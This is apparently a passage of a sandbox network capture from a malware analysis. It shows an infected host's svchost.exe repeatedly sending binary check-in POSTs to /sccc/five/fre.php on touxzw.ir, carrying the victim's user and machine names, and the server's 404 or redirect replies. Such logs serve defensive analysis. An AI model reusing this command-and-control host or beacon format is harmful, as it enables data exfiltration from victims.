Feb 25, 2025 05:25:21.304136992 CET	816	IN	HTTP/1.1 307 Temporary Redirect Date: Tue, 25 Feb 2025 04:25:21 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/sccc/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZkjwpuwlYgkaNfFUtmVPxe3H5NtKrkMh6gBAHb3edQX6IyJJoejal6uVoCXVIAj3ALjMjivFaUl8iHX44l7rmd4dhxd6%2BwocspzIuUXbiPcAyEUEKllMBnkuVTQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9174ee522d98187d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1612&min_rtt=1612&rtt_var=806&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=150&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.5	50016	104.21.96.1	80	320	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 05:25:22.494730949 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 153 Connection: close
Feb 25, 2025 05:25:22.499828100 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons320946ALFONS-PC0FDD42EE188E931437F4FBE2C
Feb 25, 2025 05:25:23.266937017 CET	840	IN	HTTP/1.1 404 Not Found Date: Tue, 25 Feb 2025 04:25:23 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8HLkD%2F%2FDeiOvDBWoSb0bp4QYbv80xogyZSCkgQ35Z6sfTEyySIVVtbyEeh2gYZjBPB5MfNh4QdRmDMOr2MC32AjHSsaXGVRiTpJYImY2liy4uNRzWQnN8BbIjkI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9174ee5e1a4742a6-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1709&min_rtt=1709&rtt_var=854&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=220&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.5	50017	104.21.96.1	80	320	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 05:25:24.417159081 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 153 Connection: close
Feb 25, 2025 05:25:24.422327042 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons320946ALFONS-PC0FDD42EE188E931437F4FBE2C
Feb 25, 2025 05:25:25.153019905 CET	822	IN	HTTP/1.1 307 Temporary Redirect Date: Tue, 25 Feb 2025 04:25:25 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/sccc/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=viHwux38Rg%2F4GFTijcvkATkXqvbZWqiXhcpTMiXF0EMG2b%2FMhNnbEGDZJk%2FOJEaC9oYc2fOHSCkZW4aPU6jZGPM1zUmQMf%2BGSsIzAlrZBZ3BfdF26ZWzdz3NUp4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9174ee6a28e78c87-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1966&min_rtt=1966&rtt_var=983&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.5	50018	104.21.96.1	80	320	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 05:25:26.315150976 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 153 Connection: close
Feb 25, 2025 05:25:26.320259094 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons320946ALFONS-PC0FDD42EE188E931437F4FBE2C
Feb 25, 2025 05:25:27.054311037 CET	822	IN	HTTP/1.1 307 Temporary Redirect Date: Tue, 25 Feb 2025 04:25:27 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/sccc/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8nVFUf2zVj2jVBFSGDKcZWbuUr%2BkXxILrQmHdaF8gB3BnvQbEKfavde6sgs4DhaNXbbiECp772mah%2FyC1H3czeN8VWSglDBFn%2Bem9ek%2FrDjtTbkrDYFp0ii3b44%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9174ee75fdfd8cd4-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1954&min_rtt=1954&rtt_var=977&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=171&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.5	50019	104.21.96.1	80	320	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 05:25:28.214761019 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 153 Connection: close
Feb 25, 2025 05:25:28.219808102 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons320946ALFONS-PC0FDD42EE188E931437F4FBE2C
Feb 25, 2025 05:25:28.971689939 CET	850	IN	HTTP/1.1 404 Not Found Date: Tue, 25 Feb 2025 04:25:28 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BZ7uyQ2Lhnqu7kcfH9TjFQQtONFkolGjGuUlYiJTRcYalVtA%2FHoncNz%2FgrAbuzlu4z9%2F7RMIgNRNJnLBPo%2B0yIUJd6rnM4cosdkda1oMxWbR%2BkuF%2FX5EkVcoROU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9174ee81da3f8ca2-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1998&min_rtt=1998&rtt_var=999&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.5	50020	104.21.96.1	80	320	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 05:25:30.135705948 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 153 Connection: close
Feb 25, 2025 05:25:30.140837908 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons320946ALFONS-PC0FDD42EE188E931437F4FBE2C
Feb 25, 2025 05:25:30.941464901 CET	847	IN	HTTP/1.1 404 Not Found Date: Tue, 25 Feb 2025 04:25:30 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=y128Q35gO3dDwJypHOwoUehqyP00h4okHSm6DeLYNHS9ZFeKKaiL9i%2BzBSamo6m7LJq%2BFd5hrSCDcG7%2FjYqAEpCVFHyBap6RgPQ8q0%2FqsF4XGNHnsvIiTnL%2FW6M%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9174ee8dde0e7c7e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2003&min_rtt=2003&rtt_var=1001&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.5	50021	104.21.96.1	80	320	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 05:25:32.128465891 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 153 Connection: close
Feb 25, 2025 05:25:32.134031057 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons320946ALFONS-PC0FDD42EE188E931437F4FBE2C
Feb 25, 2025 05:25:32.905833960 CET	844	IN	HTTP/1.1 404 Not Found Date: Tue, 25 Feb 2025 04:25:32 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QSnrH%2F7Ka1Qbfw6eHlF0L%2FlmNIC9ub17b94Px1cdLG3I7QvmSKn%2BivVQtxfI9TJIjOv6crL%2BOWkpz6tsZIXAxrk0RmN4OdaebnGlrK85HDe9dHX9xXQwIBc6cBg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9174ee9a59968c39-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1932&min_rtt=1932&rtt_var=966&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=194&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.5	50022	104.21.96.1	80	320	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 05:25:34.074167967 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 153 Connection: close
Feb 25, 2025 05:25:34.079241991 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons320946ALFONS-PC0FDD42EE188E931437F4FBE2C
Feb 25, 2025 05:25:34.791112900 CET	820	IN	HTTP/1.1 307 Temporary Redirect Date: Tue, 25 Feb 2025 04:25:34 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/sccc/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FBnVJPmNXjBAA3IfCeVy1Y1gdZxwM7x%2BsAWQEm2SaLHVKSKyoYZptT9B85SW07nSSDbixWwRrUEe9ztyFdqxWjxBzXwrX9fItRj0aCVJOGa%2BZ6RGa7Eh5dkUBGs%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9174eea67eb9f797-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1582&min_rtt=1582&rtt_var=791&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=203&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.5	50023	104.21.96.1	80	320	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 05:25:35.965142012 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 153 Connection: close
Feb 25, 2025 05:25:35.970246077 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons320946ALFONS-PC0FDD42EE188E931437F4FBE2C
Feb 25, 2025 05:25:36.740041971 CET	844	IN	HTTP/1.1 404 Not Found Date: Tue, 25 Feb 2025 04:25:36 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u0PI58ww2pkfvRSUVcRHXSXdsRFsSQXZTP36Y7I5pbYrNuF%2FLtjHxrZ%2B6kbrfsi6Z%2BdA4YlJahy3Kkf2Py%2FndGptWyYDHCK0LsOCvQBRCBuhhefv1nWoyBFPx2Y%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9174eeb24b650f69-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1689&min_rtt=1689&rtt_var=844&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.5	50024	104.21.96.1	80	320	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 05:25:37.903537035 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 153 Connection: close
Feb 25, 2025 05:25:37.908677101 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons320946ALFONS-PC0FDD42EE188E931437F4FBE2C
Feb 25, 2025 05:25:38.669800043 CET	846	IN	HTTP/1.1 404 Not Found Date: Tue, 25 Feb 2025 04:25:38 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rqbV6sLYwbTjPEYp0en%2BsZKiYS%2FNymr5oWUaNkhDy3fsGCzegp7kgu07pqJn09F7OiGRUPni75aqkoxFLa%2F9JKtlQg9NM5zoCMqbFkJcRdvY%2F0vKNvKVqttDy%2BA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9174eebe6bf77ca5-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1967&min_rtt=1967&rtt_var=983&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.5	50025	104.21.96.1	80	320	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 05:25:39.827701092 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 153 Connection: close
Feb 25, 2025 05:25:39.832786083 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons320946ALFONS-PC0FDD42EE188E931437F4FBE2C
Feb 25, 2025 05:25:40.573344946 CET	825	IN	HTTP/1.1 307 Temporary Redirect Date: Tue, 25 Feb 2025 04:25:40 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/sccc/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DsCBl3gEgIPHibD1Jb9utxMp7ZQYWXHUNVP%2FNlztftHNsqCb%2FAyGO5t1%2FeMK1FCD4D35bGKIv%2BvXHav3HzjCmCzdsiQ9ZWnXgK7N7%2FsILkG80SeGWVocV469%2FOY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9174eeca8d43c35e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1645&min_rtt=1645&rtt_var=822&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=93&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.5	50026	104.21.96.1	80	320	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 05:25:41.750845909 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 153 Connection: close
Feb 25, 2025 05:25:41.755922079 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons320946ALFONS-PC0FDD42EE188E931437F4FBE2C
Feb 25, 2025 05:25:42.543618917 CET	852	IN	HTTP/1.1 404 Not Found Date: Tue, 25 Feb 2025 04:25:42 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qnIM5LQ9kd%2F11q9kEvr8Z44aQ4%2BMO%2FNForyNZgP6BpbNMhUqLTIxAP6D9wbUuWzGBnS%2FPJW%2BZT9xzPhCPOkMKvD1c%2F2GFNj%2F57QvoPSUa8EHQ%2F98n1oD9rDnL28%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9174eed678658ce9-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1898&min_rtt=1898&rtt_var=949&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.5	50027	104.21.96.1	80	320	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 05:25:43.703857899 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 153 Connection: close
Feb 25, 2025 05:25:43.709003925 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons320946ALFONS-PC0FDD42EE188E931437F4FBE2C
Feb 25, 2025 05:25:44.428369999 CET	822	IN	HTTP/1.1 307 Temporary Redirect Date: Tue, 25 Feb 2025 04:25:44 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/sccc/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UKFhW7CQI9rGpPo8lQ4CkwTIx2Um%2B4sovh8xYijCQk3R%2Btjknht0AYKqo2cDZAfkJWgW8V1F%2Fz5NJmEkQOiZti4sSkBNgD%2FzAxMolnueImaVvAMKbWJqOqYmDXg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9174eee2abc94322-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1592&min_rtt=1592&rtt_var=796&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.5	50028	104.21.96.1	80	320	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 05:25:45.758398056 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 153 Connection: close
Feb 25, 2025 05:25:45.764297009 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons320946ALFONS-PC0FDD42EE188E931437F4FBE2C
Feb 25, 2025 05:25:46.524693966 CET	844	IN	HTTP/1.1 404 Not Found Date: Tue, 25 Feb 2025 04:25:46 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SZueTq1QpwkI6Ag6LwN4ONVeEBKTiArVb7papH4v4MSFhiFAz53Pw5p8DV9ayzoXSkX4SSnlkHZ%2F2eWYv%2BOaSGb3W%2FX5mazOVQCC%2BPGCsGNfRpmIvUot7HWXajw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9174eeef8e331835-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1752&min_rtt=1752&rtt_var=876&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=137&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.5	50029	104.21.96.1	80	320	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
